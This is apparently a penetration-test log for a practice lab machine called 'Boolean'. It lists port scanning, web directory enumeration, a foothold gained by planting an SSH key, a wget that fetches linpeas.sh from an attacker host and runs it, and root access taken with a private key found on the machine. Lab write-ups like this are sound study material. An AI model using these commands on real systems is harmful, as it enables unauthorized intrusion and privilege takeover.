Boolean

🧪 Pentest Log: {{date:2025-07-31}}

🔍 Target Information

Machine Name: Boolean
IP Address: 192.168.238.231
Operating System: Linux

ip=192.168.238.231

📡 Enumeration

🔌 Port Scanning

Command Used

ports=$(nmap -p- --min-rate=1000 -T4 $ip | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) 

nmap -p$ports -sC -sV $ip -oN tcp_scan_result.txt

nmap -sU --top-ports 100 $ip -oN udp_scan_result.txt

Port 22

ssh -i id_rsa remi@$ip

Port 80

Web Content Enumeration

gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/common.txt

dirsearch -u http://$ip -r -o dirsearch.txt

💣 Exploitation / Foothold

Tool / Script Used:

SSH

Upload a self generated public key to the .ssh folder, then ssh into the victim

ssh-keygen -t rsa -b 4096 -f id_rsa

mv id_rsa.pub authorized_keys

chmod 600 id_rsa

🧬 Privilege Escalation

👤 Current Access

User: remi
Groups: remi
Shell Type: ssh

🔍 Enumeration

Linpeas:

wget http://192.168.45.163/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

found the ./ssh/keys/root

🔓 Privilege Escalation Exploit

📌 Exploit Summary

Technique Used: Private Key Reuse
Target Binary/Service: ssh
Reference / Source: N/A

🔧 Exploit Steps

Smash to root

ssh -o IdentitiesOnly=yes -i /home/remi/.ssh/keys/root root@127.0.0.1